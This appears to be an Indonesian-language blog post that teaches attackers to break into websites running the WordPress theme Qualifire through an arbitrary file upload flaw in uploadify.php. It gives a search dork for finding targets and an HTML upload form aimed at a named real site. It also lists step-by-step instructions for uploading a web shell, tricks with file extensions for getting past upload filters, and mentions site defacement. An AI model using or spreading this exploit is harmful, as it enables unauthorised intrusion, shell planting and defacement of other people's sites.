Wordpress Themes Qualifire - Arbriarty File Upload
inurl:"/wp-content/themes/qualifire" site:. (use your brain darling)
[+]Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
[+]CSRF :
<title>CSRF Exploiter Wp-Qualifire</title>========================================================================
<h1 style="background:black; color:green; padding:3px 5px;">CSRF Exploiter</h1>
<form
action="http://inwentech.pl/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Ok Langsung saja tutorial nya simak ea :v
1.Dorking dulu dengan dork diatas
2.terus exploit juga pake explo yang diatas perhatikan juga path nya ya misal
www.site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
==>
www.site.com/wordpress2/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Kalo Vulnerable Webnya blank tapi kalo 404 ya gk vuln yha
3.masukin target site ke csrf save as ext .html ,terus buka di browser upload file nya atau shellnya(kebanyakan suport .jpg & .txt jadi pinter" kalian maen bypass ext).Terus Klik Uploads.
4.Jika sukses akan seperti ini
5.sekarang apalagi ? akses lah file nya
acces file> www.site.com/namefile.jpg
Untuk miror defacer.id ext jpg bisa baca tricknya dari ShinChan N45HT
Bypass ext shell maybe succes : .php.jpg .php.xxx.jpg .PhP.txt .php;_jpg .php.swf
.pjpg
Sekian '-'
No comments:
Post a Comment